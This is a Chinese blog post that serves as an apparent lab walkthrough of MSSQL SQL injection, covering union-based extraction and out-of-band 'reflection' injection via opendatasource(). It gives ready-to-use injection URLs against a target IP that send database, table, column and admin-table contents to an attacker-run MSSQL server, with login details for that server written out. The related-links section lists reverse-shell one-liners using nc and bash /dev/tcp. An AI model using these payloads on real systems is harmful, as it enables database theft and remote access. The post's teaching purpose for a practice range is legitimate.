MSSQL反弹注入

最新推荐文章于 2022-09-21 19:58:44 发布
最新推荐文章于 2022-09-21 19:58:44 发布
阅读量488 收藏 2
点赞数
分类专栏: 网络安全 文章标签: mssql 黑盒测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/106166650
版权

MSSSQL注入——反弹注入

我们首先先回顾一下MSSQL普通的显错注入(毕竟MSSQL显错注入和MYSQL不太一样)

我这里还是联合传为例子,首先猜字段,然后联合查询,记住要写union all,然后猜输出点,要使用NULL去填充,注释只有 – +

  1. select name from dbo.sysdatabases 查询系统库
  2. sysobjects 查询系统表 (xtype=‘U’)
  3. syscolumns 字段 (id= ) 指定sysobjects库中表名对应id

先尝试显错注入

‘ and order by 1
判断字段数,发现有3个字段
在这里插入图片描述
‘ union all select id,name,null from dbo.sysobjects where xtype=’U’ -- qwe
查询表名和其对应id
在这里插入图片描述‘ union select null,name,null from dbo.syscolumns where id=1977058079 -- qwe
查询admin表里的字段名

在这里插入图片描述‘ union select null,token,null from admin -- qwe
查询token字段里的数据,得到flag
在这里插入图片描述

这是在网页有输出点的情况下才能进行的,如果没有输出点,那么就可以用反弹注入来进行操作

在这里插入图片描述
原理:反弹注入就是是用SQL SERVER的opendatasource() 函数,将查询结果发送到另外一个SQL SERVER数据库中。从而得到我们想要的信息。

opendatasource函数
语法:opendatasource(provider_name,init_string)
provider_name:
注册为用于访问数据源的OLE DB提供程序的PROGID的名称,MSSQL的名称为SQLOLEDB
init_string:
链接字符串
链接地址,端口,用户名,密码,数据库名
sever=链接地址,端口;uid=用户名;pwd=密码;database=数据库名称
实现功能:
获取所有库.当前库所有表.表里所有内容.分区路径.
建立库和表,方便反弹时写进东西.

我们前面说到,MSSQL注入 — 反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上,那么我们需要自己的MSSQL数据库和一个公网IP,第二期我们是官方提供了这样的靶场,但是造成了诸多的不便,于是乎,经过我的各种尝试,我发现可以免费申请一个虚拟空间,然后虚拟空间中开启MSSQL然后直接使用,可以免去MSSQL安装环境并且不需要特意购置云服务器来获取一个公网IP。虚拟空间也可以搭建网站和个人博客,有兴趣可以去尝试

下面是虚拟主机的网站

香港云:http://www.webweb.com/
备用: https://my.gearhost.com/CloudSite
匿名邮箱:http://bccto.me/

MSSQL反弹注入语句解析

server=连接地址,端口;uid=用户名;pwd=密码;database=数据库名称

insert into
opendatasource(‘sqloledb’,‘server=SQL5009.webweb.com,1433;uid=DB_14A5E44_zkaq_admin;pwd=zkaqzkaq;database=DB_14A5E44_zkaq’).DB_14A5E44_zkaq.dbo.temp
select * from admin –

查询库名

http://59.63.200.79:8015/?id=1’;insert into
opendatasource(‘sqloledb’,’server=den1.mssql7.gear.host,1433;uid=testwx;pwd=Gc8x!C9O7V6~;database=testwx’).testwx.dbo.test1
select name,null,null,null from master.dbo.sysdatabases – wx

在这里插入图片描述
查询表名输入语句

http://59.63.200.79:8015/?id=1’;insert into
opendatasource(‘sqloledb’,’server=den1.mssql7.gear.host,1433;uid=testwx;pwd=Gc8x!C9O7V6~;database=testwx’).testwx.dbo.test1
select id,name,null,null from dbo.sysobjects where xtype=’U’ — wx

在这里插入图片描述
查询字段名输入语句

http://59.63.200.79:8015/?id=1’;insert into
opendatasource(‘sqloledb’,’server=den1.mssql7.gear.host,1433;uid=testwx;pwd=Gc8x!C9O7V6~;database=testwx’).testwx.dbo.test1
select null,null,name,null from dbo.syscolumns where id=’1977058079’ —
wx

在这里插入图片描述
查询字段内容输入语句

http://59.63.200.79:8015/?id=1’;insert into
opendatasource(‘sqloledb’,’server=den1.mssql7.gear.host,1433;uid=testwx;pwd=Gc8x!C9O7V6~;database=testwx’).testwx.dbo.test1
select *from admin — wx

猫鼠信安
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
getshell之sql注入os-shell
MoCoCN的博客
12-10 1950
@MoCo菜弟弟记录一次从普通用户弱口令到sql注入拿shell 0x00 前言 这段时间一直在挖edu,挖到一个从普通用户权限到getshell的站,觉得挺有意义的,记录了一下,也学到了挺多知识的,但中间出现了写小插曲,有个地方没搞好,没弄明白,就一直没发文章,最近通过某不知名大佬的帮助下已经弄懂了,所以前来发个文章。 这几天公司没什么活,主要是公司CNVD和CNNVD的资质,就是无限的刷洞,上周末领导发了句这个,我感觉是对我们这个交洞数量有点不满。 该说不说,该做不做的,领导既然都说那了必须得安排啊
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
MSSQL注入反弹注入
qq_58000413的博客
09-21 676
database=hacker数据库名 ').数据库名.dbo.表名 select *(被攻击网站的字段,通过order by已经判断出来了) from admin。database=数据库名 ').数据库名.dbo.字段 (字段可以多个,逗号隔开)反弹注入原理,将目标的数据全部反弹到自己构造的数据库中,opendatasource就是连接自己数据库用的(select * from syscolumns where id='前面查到的id值'
DC-3 渗透实战---sql注入反弹shell、Ubuntu16.04double-fdput()提权
z2560088的博客
09-26 670
扫描靶机Ip根据靶机Mac确定靶机ip地址为 nmap -sP 192.168.160.0/24 或 netdiscover -r 192.168.160.0/24 确定ip地址为192.168.160.141 nmap 192.168.160.141 -sV -p- -A 发现80端口,和开源内容管理系统 joomla 连接http://192.168.160.141 joomscan --url http://192.168.160.141 发现joomla...
18、注入篇--反弹注入MSSQL
WX公众号-小白学安全
04-10 730
MSSQL MSSQL基础 MSSQL是指微软的SQLServer的数据库服务器 每个库都会自带有sysobjects表,其中有三个字段 name 当前数据库下的所有表名 id 相当于表名的标识 xtype 字段 中 U 代表用户创建的表名,S代表系统创建的 每个库都会自带有syscolumns表,其中有两个字段 name 每个表的字段名 id 对应sysobjects表中id字段 反弹注入 原理 原理:将目标站点中查询到的数据结果 传到攻击者的数据库中 注入条件
MSSQL注入--反弹注入
weixin_30873847的博客
06-25 577
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。 判断数据库类型 and exists (select * from sysobjects)--返回正常为mssql(也名sql serve...
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
mysql注入绕过技术
06-04
mysql注入绕过技术
mysql练习注入语句
01-21
mysql
MySQL 及 SQL 注入
12-16
MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是...
反弹shell
stonesharp的专栏
04-03 3367
各种反弹shell的方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell的几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
渗透测试基础-SQL server数据库之反弹注入
weixin_45488495的博客
04-15 618
渗透测试基础-SQL server数据库之反弹注入SQL server数据库SQLserver显错注入靶场演练堆叠注入SQLserver反弹注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! SQL server数据库 既然要学习SQLserver数据库的注入知识,那当然得先了解一下SQLserver的语句。 数据库都有着相通的地方,所以其SQL语句也相差不大。先来看一下SQLserver数据库是怎样的一个数据结构。 根据截
如何DIY一个简单的反弹Shell脚本
weixin_34200628的博客
12-12 225
00起因 之前在一个服务器上做测试的时候需要从本地连到服务器上,但是服务器没有开ssh服务,但是有python环境,想着自己写一个脚本可以从自己本地连接到服务器,然后服务器端可以将处理完的请求结果返回到本地。 0×01设计的构图           0×02编码实现 ① 服务器与本地实现通讯 首先我们编写在服务器端需要运行的程序,这个程序主要的功能就是接收传入的数据然后对传入的数据进行处理,...
大哥带的mssql注入拿shell
weixin_30532759的博客
05-29 658
任务二 注入点拿shell 路径的爆破 https://blog.csdn.net/edu_aqniu/article/details/78409451 0X01判断 是否为判断当前数据库用户名是否为DB_OWNER: 是 Mssql拿shell有两种方法 win2008sever里面 0X02数据库备份拿shell 0X001 创建自己的数据库 http://ww...
常见反弹shell总结
weixin_45116657的博客
10-21 494
1、nc 发送:nc -e /bin/sh 10.0.0.1 1234 接收:nc -nlvp 1234 2、bash: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 3、perl: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getp...
记首次HW|某地级市攻防演练红队渗透总结
include_voidmain的博客
05-11 634
声明 以下内容,来自先知社区walker1995作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。 0x01 前言 上周参加了某地级市为期七天的网络攻防演练对抗赛,总共14支攻击队。大概情况是:第一天多为弱口令和应用层漏洞攻击且有攻击队申请高危漏洞攻击,之后想必都开始了高危漏洞利用,内网攻击,第四天就有攻击队开始使用0 day,Nday,社工钓鱼攻击,从第五天凌晨起进入混打乱斗模式,所有目标都变为公共目标,第七天18点
利用MSSQL getshell
热门推荐
浅笑996的博客
11-17 1万+
此次复现使用的sql server 2000 和sql server 2008两个环境进行的 是在已知数据库密码的基础上进行的 0x01 MSSQL连接 连接MSSQL 2000 新建连接: 填写目的IP、目的端口、用户名、密码: 一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接: 若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试 新建SQL编辑器即可执行SQL语...
mysql反弹注入平台_MSSQL-反弹注入
weixin_27964579的博客
02-11 152
工具:香港云免费云服务器:http://www.webweb.com注册使用匿名邮箱:https://bccto.me/香港云服务器搭建MSSQL数据库,并建表admin,字段数要大于等于我们想要获取的表。闭合;通过order by查询到表中为三字段。后来通过问别人知道里面还有一字段类型是二进制大对象 不支持order by——-所以说是四个字段,建表时尽可能多建吧。先按照视频上讲的对靶场数据库进...
sqlserver命令注入和getshell
buffedon的博客
07-03 3687
sqlserver命令注入和getshell1. mssql权限判断当前数据库权限2. mssql 默认数据库3. 数据库常用语句查询当前数据库中所有表的大小4. SA权限开启xp_cmdshell 获取主机权限5. SA权限使用sp_oacreate 执行系统命令6. SA权限使用CLR 执行系统命令6. DB_owner权限 LOG备份Getshell7. DB_owner权限 差异备份Getshell补充CLR导入程序集 1. mssql权限 sa权限:数据库操作,文件管理,命令执行,注册表读取等s
mysql 注入扫描
最新发布
12-02
MySQL注入扫描是一种针对网站或应用程序的安全漏洞进行检测的技术。通过MySQL注入漏洞,攻击者可以将恶意代码注入到网站或应用程序中,从而获取敏感信息、通过数据库执行命令或者破坏网站功能。因此,对于网站或应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值